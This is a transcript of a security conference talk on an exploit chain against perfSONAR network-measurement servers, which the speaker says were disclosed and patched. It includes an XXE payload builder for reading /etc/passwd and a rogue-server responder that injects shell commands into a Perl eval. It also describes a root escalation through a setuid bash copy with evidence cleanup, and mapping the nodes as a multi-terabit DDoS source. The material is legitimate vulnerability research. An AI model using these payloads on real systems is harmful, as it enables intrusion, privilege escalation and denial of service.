Welcome, and thank you all for skipping lunch to be here. Welcome to my talk on attacking network infrastructure. My name is Luke. Here's some important info about me: I'm a security engineer originally from Minnesota, currently working in the Bay Area, and a junior undergraduate student. It's my second year at DEF CON; I spoke last year. I also participate in a lot of bug bounties, so if any of your companies run a bug bounty, you've probably heard my name: the jerk that submits bugs at anything other than working hours. If you have any questions about this presentation, or you'd like to send me legal threats, there's my contact information. I'll put it back up at the end, and the code and slides for this presentation will be linked at the end as well. [Audience: Louder!] Okay, better. Trying to avoid tipping the mic over. All right, let's get the boring stuff out of the way first. Here's my lovely disclaimer: the views and opinions expressed in this presentation are those of the author and do not necessarily reflect the official policy or position of any current, previous, or future employer. Just don't sue me. As usual, we'll start with a quick rundown of what we're going to talk about today. I'll start with what Internet2 is, then move into some of their products, mapping their network, and then exploiting some of those products in order to gain control of devices that sit on very large network uplinks. Now, to make this presentation work, there are two computers and four VMs up here that all have to work together perfectly, and there are only so many sacrifices you can make to the demo gods, so please bear with me if things don't work well. I've tested them enough. Without further ado, let's get started. I want to give a bit of backstory on how I got started looking at this software and the perfSONAR product, which we'll get into in a minute.
The university I attend has a nice website full of information about what applications and services are available to me as a student. When I'm bored, I like to browse around and see what I'm able to access; it's kind of amazing what an EDU email address grants you these days. One of these pages was called Internet2. The description reads: the Internet is a global system of interconnected networks; the university connects to both the global Internet and a number of special research networks; these research and education networks, commonly referred to as Internet2, provide high-bandwidth connectivity, enabling and supporting research collaborations and educational opportunities regionally, nationally, and around the world. Basically, it's a private fiber network run between universities, used for sharing all sorts of research data that would take a very long time to transfer over the standard Internet. If you go to their website, you find an even more boring description about how Internet2 is a community of researchers and leaders in research and academia. Basically, it's a consortium of universities. There are some corporations and some government agencies, but it's mainly universities connected to it, and it's mainly used for sharing research. But one of the other things they do is create software for everyone in the consortium. They share that software between all of the companies and universities that participate, and in doing so, they also share vulnerabilities with each other, since they're all running the same software. They also do collective bargaining on everything from AWS to Splunk to VMware. Basically, it exists to benefit all of the organizations that participate. The other thing it is, is a private network, which is what I was talking about. This is a map of their actual dark fiber.
It totals about 8.8 terabits a second of optical capacity and about 100 gigabits a second of Ethernet capacity. Again, it was mainly developed for sharing research and technologies between universities. Now, I get really excited when I see something like this, because it's not just a whole bunch of blinking lights: these are additional routing paths between each of the nodes on this network. Internet2 has been around since 1997, and a lot of people didn't really care about security back then, so there's a whole lot of risk here, where these routing paths might be trusted, or might not even be considered, by some security teams, because they've been around for so long. In addition to the actual network, as I said, they produce a variety of products, and most of them are open source, which is really nice. The most popular one is called Shibboleth. It's a federated identity management system, essentially a really nice, really extensible SAML provider. If you've ever done any penetration testing on pretty much anything running at a U.S.-based university, it likely interacted with Shibboleth for authentication. But Shibboleth is their most popular product and has been poked at by other people before, so I wanted to look at some of their other stuff. They have a lot of tools in the performance and analytics category. Because they run these fiber networks, they need to maintain the health of those networks, and they do that through a tool called BWCTL, bandwidth control, which is essentially a wrapper around iperf: it does a lot of the hard work of setting up a receiver and a sender on either end. NDT is a network diagnostics tool, and OWAMP is one-way ping. And then perfSONAR is a wrapper around all of those tools. It's essentially an ISO you download and install on one of your servers, and it makes scheduling bandwidth control tests and OWAMP tests really easy.
We'll look at what it actually looks like in a minute. First off, I just explained what perfSONAR is; to give a concrete example, say we're here in Las Vegas. If the network operator in Las Vegas wanted to make sure that their fiber connection to Salt Lake City is remaining solid, they would set up a perfSONAR instance in Las Vegas and a perfSONAR instance in Salt Lake City. Because they're all part of the same network, they collaborate: you set up tests to run, say, every 24 hours, and it will alert you if the network goes down or if performance starts degrading. All right, let's actually look at this. I have two perfSONAR instances set up here, and I'm going to go for the easier things first. You can see they're on the same network. So I'm going to run a quick bandwidth control test here, just to show how some of their tooling works. What it's done here is chosen to use iperf. You can customize this: you can say I want to use thrulay, or I want to use iperf3. Then it schedules a test between the two, because the way iperf works, you need both ends to agree on when to set up a receiver and what ports to use. Once that time passes, we have our info here: we can see we've got about a gigabit a second, which makes sense, since both of these hosts are on gigabit connections. All right, now let's look at the actual toolkit website. This, if it loads, is the actual perfSONAR web interface. It's essentially just a GUI for the tool I just used. You can see here I've set up a test to run about every half an hour between impact and torpedo, and we can see the last throughput measurement was 600 megabits a second. I can pull up a graph of how that's changed over time. Since this is a virtual machine, there are big gaps here, but you get the idea.
It's easy for a network administrator to look at this and see what's happening on their network. All right, back to the actual presentation. One of the things I like to do when I'm first approaching a product and looking for issues is to look at what mistakes have already been made in the past. Developers tend to make the same mistakes over and over again; it's just how it is right now in the industry. So I went through the old issues. perfSONAR used to be hosted on Google Code; their project page is back up now, after being down because of the whole Google Code deprecation. Issue 783 is a vulnerability in the web interface I just showed you. It was patched in 2013, and this is the patch. If you look at it, it's pulling in Perl's LibXML library and adding an external entity handler that always returns an empty string. So let's look at what an external entity is, and then how to exploit one in the real world. We start with a simple XML file. Hopefully everyone can see this: it's a list of all the presentations I've given, with the name, the location, and then the author. The author is always going to be the same every time: it's always going to be Luke Young. XML has a feature where you can define an entity. So I define an entity called ly with the value "Luke Young", and then I can just reference that entity with an ampersand, the name of the entity, and a semicolon. That way, if I ever changed my name, say if I got married, it would update throughout the rest of the XML document. Most XML parsers support this by default, so when you go to get the value, in Python or whatever you're using, it will just return "Luke Young". It happens transparently. One of the most popular attacks on this is something called the billion laughs attack, which is a denial-of-service issue. You start with a single entity.
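To make that entity substitution concrete, here is a minimal sketch using Python's standard-library parser. The toolkit itself uses Perl's LibXML; Python is only used here for illustration.

```python
# Internal XML entities are substituted transparently by most parsers.
# Python's expat-backed minidom is used purely for illustration.
from xml.dom.minidom import parseString

doc = parseString(
    '<?xml version="1.0"?>'
    '<!DOCTYPE talks [<!ENTITY ly "Luke Young">]>'
    '<talk><author>&ly;</author></talk>'
)

# The parser replaces &ly; with the entity's value before we ever see it.
author = doc.getElementsByTagName("author")[0].firstChild.nodeValue
print(author)  # -> Luke Young
```

Note that expat expands internal entities like this by default, but will not fetch external ones unless you opt in, which is exactly the kind of hardening the patch above was trying to enforce.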
Then you define an entity that includes that one ten times, and another that includes that ten times, and you get exponential growth in memory when an XML parser tries to deserialize it. This example expands to something like 16 gigabytes of memory and will crash most applications that have XML entities enabled. But denial-of-service bugs in this context are kind of lame; just crashing the software is boring, and not what we're looking for. The more interesting feature of XML is something called external entities. You can define a SYSTEM entity with a file URL, and what this does is actually load the contents of that file and inject it into the XML. In this case, I'm going to load in /etc/passwd and fill it in right here. This was originally intended for people that have multiple XML files: you can include other XML files within one another, so you load in just one of the files but keep a nice folder structure, without having everything in one giant XML file. However, there's obviously a lot of potential for abuse here, because you can include any file from the system. So, back to the actual issue. The patch was to make any external entity load return an empty string. That doesn't prevent the denial-of-service issue we just referenced, but it does mean loading a file URL will fail. So the first thing I did was rsync the file system off one of these devices and search for LibXML->new calls without an external entity handler defined. We're looking to see if they missed anything, or if someone added new endpoints where they forgot to add the patch. And if we run it, right off the bat we've got a batch of potential ways to get into this application using external entities. Now, this is actually a bit of a false positive.
Some of these are libraries that are symlinked, so Sublime thinks they're different files; there are actually only about six different ones here. The particular one that's vulnerable is in the NMWG message handling. As you can see here, it creates a LibXML handler, doesn't set up anything to block external entities, and then parses in a file. And if we trace this all the way back up the stack, it's accessible as an external user. That request looks a little bit like this: we send a SOAP request (if any of you have done stuff with XML, you probably know what SOAP is), define this NMWG message, and within it include /etc/passwd, this file right here. We're going to try to do this live now. We send a SOAP request to the oppd daemon on this server, which traces all the way back to that Perl file, and if we run it, there's /etc/passwd off one of the systems. Next thing I want to do: authentication in this application is handled by /etc/shadow, so I'm just going to read /etc/shadow instead. This is a file I didn't show; it's the exact same thing, except for /etc/shadow. And it doesn't work. It sends us an extremely verbose error message saying it can't read that file. The reason that's happening is that the oppd daemon isn't running as root on this device, so we don't have permission to read it. We can read other stuff off the system: for example, SQL passwords and configuration files. However, none of it was really exploitable. While we can read arbitrary files, because authentication is handled by /etc/shadow, we couldn't get admin users; we couldn't get anything interesting. The SQL database is blocked off so it's only accessible from localhost. So I hit a complete dead end here. If we go back to the presentation.
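The XXE request from that demo boils down to one trick: a DOCTYPE that declares an external entity pointing at a local file, and an entity reference that pulls the file's contents into the body. Here is a rough sketch of building such a payload; the SOAP envelope and element names are simplified stand-ins, not the exact schema the oppd daemon expects.

```python
# Build an XXE payload: the DTD declares an external entity backed by a
# file:// URL, and &xxe; injects that file's contents into the message.
# The envelope structure below is a simplified stand-in, not the real schema.
def build_xxe_payload(target_file: str) -> str:
    return f"""<?xml version="1.0"?>
<!DOCTYPE soap [ <!ENTITY xxe SYSTEM "file://{target_file}"> ]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/">&xxe;</nmwg:message>
  </soap:Body>
</soap:Envelope>"""

payload = build_xxe_payload("/etc/passwd")
# POSTing this to a parser with external entities enabled echoes the file back.
```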
At this point I had found cross-site scripting kind of everywhere, but cross-site scripting bugs are kind of lame: you have to get an admin to click a link, and they don't visit these devices that often. There was a lot of XXE, and as you saw, there were other issues there, but getting RCE just seemed like an impossible task. I actually put it down for about a month, and when I finally came back to it later, I found something called bandwidthGraph.cgi. When I pulled up that graph a second ago, that was bandwidthGraph.cgi. This endpoint handles graphing historical bandwidth data from tests, and if we look at the source code for it, we can see something interesting: there's an eval call on an attribute from the XML data that is sent in. We'll trace this all the way back up and get into exploiting it now. Here's some example performance data. You can see it's basically iperf results, with a timestamp and a throughput value, and the throughput value is a scientific-notation number. Parsing that properly is like five lines of code, and parsing it with eval is one. So a developer was being lazy and decided to use eval, thinking it was perfectly safe. You can see why they made this mistake, though: you're in a rush, it happens. So let's look at how to reach this code path, because it's quite complicated. Starting at the top of bandwidthGraph.cgi, we need a couple of parameters. We need a url parameter, which points to the measurement archive. The measurement archive contains all of the data from tests that have run over time, and we need a URL to access it from, because you can run this in a cluster environment. We also need a key to look the test up by: if a test has a name, it has a key. Assuming we have both of those, we get all the way down into this get-data function.
It sets up a data request, makes a request to the measurement archive, and then pulls out this datum XML attribute. Long story short, it gets all the way down to the throughput value. There's actually a second step in here, though. The way the measurement archive works, when the toolkit makes a request, it first sends an echo request, and we have to echo that back with a success message before it will request the data. The reason that handshake is there is to avoid exactly this kind of attack scenario, where you point it at an attacker-controlled system. However, since this is open source and we have complete access to the source code, we're able to generate the correct echo response. This is what an example echo request looks like. The important part is the event type: as long as our response has that string, it'll be accepted by the server. Following that, we send back our actual exploit string. If you look at the throughput parameter here, you can see a backtick. Because this value is executed by Perl, and in Perl backticks drop to a shell, here's our example exploit. I actually have a script to do all of that, and all of these scripts are available right now if you have the link. So we have a simple server here that handles all of the magic of sending the echo response and then the exploit string. You can see we provided the key parameter, which in this case doesn't matter, because we control the server, and then the URL pointing at our server. We don't see anything interesting on the page, but if we look at the page source, we can see right there that it's printed out the results of whoami. Taking that a step further, we can use a full Python PTY callback, so we can get an actual shell on this device.
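The malicious "measurement archive" therefore only needs two behaviors: satisfy the echo handshake, then serve a datum whose throughput attribute carries a backtick command for Perl's eval. A rough sketch of that response logic, with element and attribute names simplified from the real NMWG schema:

```python
# Sketch of the attacker-controlled measurement-archive logic.
# Element/attribute names are simplified, not the exact NMWG schema.
def archive_response(request_body: str, command: str = "whoami") -> str:
    if "echo" in request_body:
        # Step 1: answer the toolkit's echo handshake with a success
        # message so it trusts us enough to request the data.
        return "<nmwg:message><result>success</result></nmwg:message>"
    # Step 2: the throughput value is fed straight into Perl's eval();
    # backticks make Perl shell out and run our command.
    return (f'<nmwg:message>'
            f'<datum timeValue="0" throughput="`{command}`"/>'
            f'</nmwg:message>')
```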
Instead of having to run commands one at a time, we refresh the page, and we have a full shell now. You can see we're running as Apache. So, same thing as before: we try to cat /etc/shadow, and it doesn't work again. We're kind of stuck. Having regular RCE is fun, but we want root RCE. So, back to the presentation. If we pull up the perfSONAR toolkit interface, it has the ability to change configuration settings. You can turn services on and off, such as bandwidth control and OWAMP, and you can change configurations for those: the default port, or what restrictions there are. For example, you can set bandwidth control to only accept TCP, or only accept UDP, performance tests. And in order to start and stop services on Linux, you need root, unless you've made special changes. So somehow the application is obtaining root in order to do this. But if we go back to our shell, we don't have sudo privileges, and there's no really easy way to find root there off of any file permissions or anything else. If we look in the source code again, all the way down, they have a daemon running as root called toolkit config. It's a simple XML-RPC server, it's only listening on loopback, and it exposes five methods: a firewall method, which accepts no parameters, so nothing exploitable there, plus write file, and start, stop, and restart service. Write file looks really interesting. Ideally we'd just write a new file, a new cron job, as root, and now we have escalation. Here's the example code to do that: we load in the config client, set it up to point to the loopback interface, and then call the save file method, which is an alias of write file. I don't know why they changed the method name in different parts of the application. And if we try to actually run this, it doesn't work. We have another issue: if we look at the source code, there's actually a whitelist.
It's a whitelist of what files you're allowed to edit. So they put a little thought into this and decided we shouldn't let someone write arbitrary files as root; that's a bad idea. So they built this whitelist, and here are all of the files in it. Because this is an extremely customizable application, where you can install other packages, basically any config file that would ever need to be edited as part of this application is in the list. And there are a couple of interesting ones. There's /etc/hosts, so we have the ability to redirect network traffic. There's the NTP config, so if we have any issues, we can change the time on the host. Along with those there's a bunch of perfSONAR software config, such as bandwidth control, all of which we can edit. We can also write HTML files, since we're Apache, so we could drop a cross-site scripting payload. But again, not very interesting; we want root on this device. So let's look at the bandwidth control configuration. This is an excerpt from it. It's got a user and a group, so the daemon drops privileges immediately after starting, and then a post hook parameter at the bottom. This is similar to a git hook: after a successful bandwidth control test, it executes the post hook. Since we can edit this config file, we can change the user and group so that the application never drops privileges and keeps running as root, and then point the post hook at a script controlled by our Apache user. That way, when we trigger a successful test, it triggers our post hook as root. Actually doing that is a little more complicated. We don't want the network administrator to notice that something's broken, so we have to do this, and then restore the original configuration, as quickly as possible. So: back up the original config, stop bandwidth control, write our post hook, write the new bandwidth control config, start bandwidth control.
Then trigger a session, which has to be successful, which triggers our post hook. Then stop bandwidth control, remove our post hook so we delete our evidence, restore the original bandwidth control config, and start it back up again. We're going to actually try that now. We have our shell, currently logged in as Apache. I'm going to pull down shell.pm, which is a script I've written, and run it. That's going to take about 60 seconds, so let's look at what it's doing. It's pulling in, again, the config client. We're loading in... I don't know why this line has to be here, I don't write Perl scripts, but it crashes if it's not. And here is the file we're actually writing: we're going to copy /bin/bash to a different path and then set the setuid bit on that binary, so that whenever we run it, we become root. The rest of this does all of the work of swapping in the exploit config and restoring the original. Here's our exploit config, with the post hook parameter inside it. So if we go back to the shell... hopefully... this is why you don't do live demos. Let's try that again. No... oh, we are root. Okay, it did work. Awesome. Now, that's fun: we have root on these devices. But who cares? Is anyone actually even running these things? I happened to stumble across this; it's an obscure application. So the next goal was to find out where these are running. I don't have an ISP that plays nice with mass-scanning the entire IPv4 internet space, so I had to find a nicer way to locate these devices. If you look at an example, here's a live instance of one of these running. You can see there's all sorts of information here, and this is unauthenticated: you can view all of it without any creds. You can see what services are running and what ports they're running on, and more importantly, you can see the interfaces on the right there.
You can see whether they're connected, whether they're dual-homed, and whether they're connected to an internal private network. You can see the MAC addresses of the devices, and you can see the speed of the card according to ethtool, so we can tell if there's a 10-gigabit card inside each device without even authenticating. The other thing we have here at the bottom is test results, so you can see which instances one of these is testing against. The idea is: we start with one of these nodes, ask it who it's testing against, then ask each of those nodes who they're testing against, and map the entire network that way. But we still need some starting nodes. If only there were a nice public database of all of these devices... oh, wait. If you look in the corner up here, there's "globally registered", which is pretty much exactly what you think it is. They provide an actual database on their site of all of the globally registered perfSONAR servers, also unauthenticated. It even has a pretty web interface. So here's the idea: we start with the public list, and because there are still unlisted instances, we map the network out from there. The grayed-out ones here represent instances that aren't publicly registered but that we can locate through the other ones. All right. So I wrote an approximately 300-line Golang script that does exactly what I just described: it pulls down the list of all the publicly registered instances, asks each of them who they're testing with, maps all of those, and pulls down the interface data from each of them. It takes about four minutes to map the entire network from my gigabit connection. That could probably be improved; it's not actually saturating the link, and my code kind of sucks, but it's open source, so someone else can fix it. What I then do is take all of this data and load it into Splunk.
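The crawl just described is a plain breadth-first search over the test relationships. A sketch of the idea, where fetch_peers stands in for the unauthenticated "who are you testing against?" API call:

```python
from collections import deque

def map_network(seeds, fetch_peers):
    """Breadth-first search outward from the publicly registered nodes."""
    seen, queue = set(seeds), deque(seeds)
    while queue:
        node = queue.popleft()
        for peer in fetch_peers(node):  # "who are you testing against?"
            if peer not in seen:        # unlisted instances surface here
                seen.add(peer)
                queue.append(peer)
    return seen

# Toy topology: "c" is unlisted but reachable; "d" never shows up anywhere.
topology = {"a": ["b"], "b": ["c"], "c": [], "d": []}
found = map_network(["a"], lambda n: topology.get(n, []))
print(sorted(found))  # -> ['a', 'b', 'c']
```

The real script does the same thing concurrently in Go and also records each node's interface data as it goes.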
Splunk didn't sponsor me or anything; I just like Splunk. Using all of that, as of April 29th when I mapped the network, there were 970 publicly routable nodes, with a combined 12.51 terabytes of RAM and 29.85 terahertz of CPU cycles across all of these devices. In easier-to-understand terms, the average node has 13 gigabytes of RAM and 12 cores at 2.6 gigahertz. All right. Next, we want to look at the theoretical network speed of these devices. Included in that data is information about each network card, so I can tell if it's a 10-gig or a 20-gig or a 40-gig card. If we sum all of those together, we get the theoretical bandwidth of the perfSONAR network: 5.719 terabits a second. Now, theoretical speeds are kind of lame, and I really wanted to know what this was actually capable of, because you may have a 10-gig card and only a 5-gig uplink, and I can't find any way to tell that without exploiting your server, and I like not going to jail. However, I had an idea. I have a gigabit connection at home, so I can run bandwidth tests from my server to one of the perfSONAR instances and find out information about their bandwidth. But that has an upper bound: I can only measure up to a gigabit a second, since I only have a gigabit uplink, and I'm not about to pay for a 40-gig uplink in order to test these vulnerabilities, so I had to find some other way. It turns out they have another friendly unauthenticated API where you can say: run a bandwidth test against this other perfSONAR node and send me the results. So the goal is to enumerate all the perfSONAR instances and their maximum interface speeds, calculate their locations based on GeoIP, find the five closest instances to each that have the same or faster network cards, and then, after all of that's done, run tests between them. This sounds like some horribly messed-up CS interview question.
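That pairing step, finding each node's five nearest peers with equal-or-faster cards, can be sketched like this, using great-circle distance over the GeoIP coordinates. The node record fields here are illustrative, not the actual Splunk schema.

```python
import math

def haversine_km(a, b):
    """Great-circle distance between two (lat, lon) points, in km."""
    lat1, lon1, lat2, lon2 = map(math.radians, (*a, *b))
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2)
         * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * 6371 * math.asin(math.sqrt(h))

def closest_peers(node, nodes, k=5):
    """Pick the k nearest nodes whose card is at least as fast as ours."""
    peers = [n for n in nodes
             if n is not node and n["speed_gbps"] >= node["speed_gbps"]]
    peers.sort(key=lambda n: haversine_km(node["loc"], n["loc"]))
    return peers[:k]
```

Pairing like-for-like speeds matters because a test between a 10-gig node and a 1-gig node can only ever demonstrate 1 gig.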
I can guarantee you I did not implement this very efficiently. There's the Splunk query that does all of that. It works; it takes like an hour to run, but it does return results. Once we have all of that data, we actually want to run these tests, and we have to be careful here, because we genuinely risk generating a denial of service when running them. So: we only want to run a couple of tests at the same time, we never want more than ten running at once, and we never want to run two simultaneous tests against the same instance. If you have a 10-gig uplink and I run two 10-gig tests against you, they'll each get about 5 gigs, which is inaccurate; I want to run only one at a time. Also, some hosts don't have bandwidth control enabled, and while I know they're exploitable, I can't find out what their bandwidth is. So we're losing some data here about hosts that, if we were exploiting this for real, we would have been able to attack, but can't measure because they don't have bandwidth control enabled. Doing all of that, which takes a very long time to run, I was able to calculate the actual demonstrated total bandwidth of the perfSONAR network: 3.7 terabits a second. Now, in the title of the talk I mentioned 4 terabits, and I didn't just round up. I accounted for all those instances that don't have bandwidth control enabled but that we know are sitting on at least a 100-megabit uplink; combine that all together and you get up to 4 terabits a second. So, if any of you were around five years ago, Cloudflare blocked an attack in Europe against Spamhaus. It was a 300-gigabit-a-second attack, and they saw an interesting effect: while some of their network could handle the traffic, their upstream ISP peers were actually falling over.
And that's one of the risks when you have this much bandwidth, and that was 300 gigabits a second, years ago. We have complete control of the packets being sent, because we are root on these devices. This isn't something like DNS amplification, where, if you have the right firewall rule, you can block the traffic. This is: I can send you four terabits a second of legitimate HTTP requests, assuming the network cards can push that out. It's really hard to filter something like that, because it could be legitimate traffic. Granted, there are actually some interesting ways to defend against stuff like this. All right, on to the live demo. Hopefully we're going to take down a site here, and not someone else's site, again. For the initial version of this talk, I had a couple of perfSONAR instances running at home, and I was planning on attacking a server co-located in a data center. I launched the attack while doing rehearsals, and my phone blew up, because I had crashed the network at the house, and there were about 18 dudes pissed off at me that their internet didn't work. About 10 minutes later, I got a letter from the ISP saying please stop doing that. So we're going to cheat a little and attack some VMs here instead. We have a simple HTTP server running on poncho here. I'm going to download a simple DDoS script and run it, and... it's really hard to see, but that page is just sitting there spinning right now. All right, on to the last part. I reported all of these issues to perfSONAR, so, sorry to disappoint you, you can't actually go exploit these right now. Though I would highly encourage people to continue looking at this software. It is a legacy Perl application, and I don't think I found everything by any means; I kind of stopped once I had a full chain all the way to root. It is interesting, and they are very responsive.
This was one of the pull requests: since it's all open source, I just fixed the issues myself. The team was extremely friendly. They fixed the issues, merged my request within 24 hours, and pushed out a new build pretty much immediately. And the great part is, all of these instances have auto-updates enabled, so pretty much everyone on the network is upgraded at this point; that build went out about a month ago. So when you do find security issues, they typically are patched very quickly, which is great; I was very happy with their response time. Finishing this up: all of the exploit code has been released on my GitHub, along with the slides, and bored.engineer has links to it right there if you don't remember that. As promised, here's my contact info again. We got out a little early this time, so you have some time to make it to your next talk, but if people have questions, feel free. [Audience question.] That was a really good question: he asked what I spent the $5 on. I'll repeat the question: what did I spend $5 on? It's in the talk title. In the initial version of this talk, I was going to spin up a VPS instance for $5 and then launch an attack live across the internet, and then of course my ISP got very angry about that. I did not update the title, unfortunately; that's what the $5 is from. [Audience question about total time spent.] Actually finding the exploits was probably 10 hours, and writing reliable exploits for them was probably another six. Mapping the network was a colossal pain, since I'm not a stats person, and figuring out how to write those queries correctly sucked; that was probably another 10. So roughly 40 hours total. Thank you all, have a great DEF CON. Thanks.